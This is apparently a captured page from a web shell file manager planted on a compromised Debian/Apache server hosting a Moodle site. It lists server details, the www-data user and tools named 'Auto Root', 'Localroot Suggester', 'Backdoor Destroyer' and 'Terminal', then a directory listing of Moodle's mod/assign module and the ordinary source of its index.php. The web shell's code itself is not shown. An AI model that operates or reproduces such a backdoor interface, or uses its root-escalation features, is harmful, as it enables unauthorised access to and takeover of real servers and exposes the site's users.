Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
mod /
assign /
Delete
Unzip
Name
Size
Permission
Date
Action
amd
[ DIR ]
drwxr-sr-x
2017-06-22 15:07
backup
[ DIR ]
drwxr-sr-x
2017-06-22 15:07
classes
[ DIR ]
drwxr-sr-x
2017-06-22 15:15
db
[ DIR ]
drwxr-sr-x
2017-06-22 15:15
feedback
[ DIR ]
drwxr-sr-x
2017-06-22 15:07
lang
[ DIR ]
drwxr-sr-x
2017-06-22 15:07
pix
[ DIR ]
drwxr-sr-x
2017-06-22 15:16
submission
[ DIR ]
drwxr-sr-x
2017-06-22 15:08
templates
[ DIR ]
drwxr-sr-x
2017-06-22 15:17
tests
[ DIR ]
drwxr-sr-x
2017-06-22 15:17
yui
[ DIR ]
drwxr-sr-x
2017-06-22 15:08
adminlib.php
12.02
KB
-rw-r--r--
2017-06-22 15:15
adminmanageplugins.php
1.41
KB
-rw-r--r--
2017-06-22 15:15
assignmentplugin.php
22.98
KB
-rw-r--r--
2017-06-22 15:15
batchsetallocatedmarkerform.php
2.33
KB
-rw-r--r--
2017-06-22 15:15
batchsetmarkingworkflowstateform.php
3.73
KB
-rw-r--r--
2017-06-22 15:15
extensionform.php
5.58
KB
-rw-r--r--
2017-06-22 15:15
externallib.php
123.33
KB
-rw-r--r--
2017-06-22 15:15
feedbackplugin.php
6.34
KB
-rw-r--r--
2017-06-22 15:16
gradeform.php
3.97
KB
-rw-r--r--
2017-06-22 15:16
gradingbatchoperationsform.php
3.9
KB
-rw-r--r--
2017-06-22 15:16
gradingoptionsform.php
4.96
KB
-rw-r--r--
2017-06-22 15:16
gradingtable.php
63.23
KB
-rw-r--r--
2017-06-22 15:16
index.php
1.84
KB
-rw-r--r--
2017-06-22 15:16
lib.php
61.18
KB
-rw-r--r--
2017-06-22 15:16
locallib.php
356.11
KB
-rw-r--r--
2017-06-22 15:16
mod_form.php
13.05
KB
-rw-r--r--
2017-06-22 15:16
module.js
8.01
KB
-rw-r--r--
2017-06-22 15:16
override_form.php
11.4
KB
-rw-r--r--
2017-06-22 15:16
overridedelete.php
3.39
KB
-rw-r--r--
2017-06-22 15:16
overrideedit.php
7.91
KB
-rw-r--r--
2017-06-22 15:16
overrides.php
10.61
KB
-rw-r--r--
2017-06-22 15:16
quickgradingform.php
2.39
KB
-rw-r--r--
2017-06-22 15:16
renderable.php
36.35
KB
-rw-r--r--
2017-06-22 15:16
renderer.php
64.1
KB
-rw-r--r--
2017-06-22 15:16
settings.php
16
KB
-rw-r--r--
2017-06-22 15:16
styles.css
32.92
KB
-rw-r--r--
2017-06-22 15:16
submission_form.php
2.19
KB
-rw-r--r--
2017-06-22 15:17
submissionconfirmform.php
2.32
KB
-rw-r--r--
2017-06-22 15:17
submissionplugin.php
4.41
KB
-rw-r--r--
2017-06-22 15:17
upgrade.txt
7.26
KB
-rw-r--r--
2017-06-22 15:17
upgradelib.php
19.39
KB
-rw-r--r--
2017-06-22 15:17
version.php
1.16
KB
-rw-r--r--
2017-06-22 15:17
view.php
1.9
KB
-rw-r--r--
2017-06-22 15:17
Save
Rename
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Displays information about all the assignment modules in the requested course * * @package mod_assign * @copyright 2012 NetSpot {@link http://www.netspot.com.au} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once("../../config.php"); require_once($CFG->dirroot.'/mod/assign/locallib.php'); // For this type of page this is the course id. $id = required_param('id', PARAM_INT); $course = $DB->get_record('course', array('id' => $id), '*', MUST_EXIST); require_login($course); $PAGE->set_url('/mod/assign/index.php', array('id' => $id)); $PAGE->set_pagelayout('incourse'); \mod_assign\event\course_module_instance_list_viewed::create_from_course($course)->trigger(); // Print the header. $strplural = get_string("modulenameplural", "assign"); $PAGE->navbar->add($strplural); $PAGE->set_title($strplural); $PAGE->set_heading($course->fullname); echo $OUTPUT->header(); echo $OUTPUT->heading(format_string($strplural)); $context = context_course::instance($course->id); require_capability('mod/assign:view', $context); $assign = new assign($context, null, $course); // Get the assign to render the page. echo $assign->view('viewcourseindex');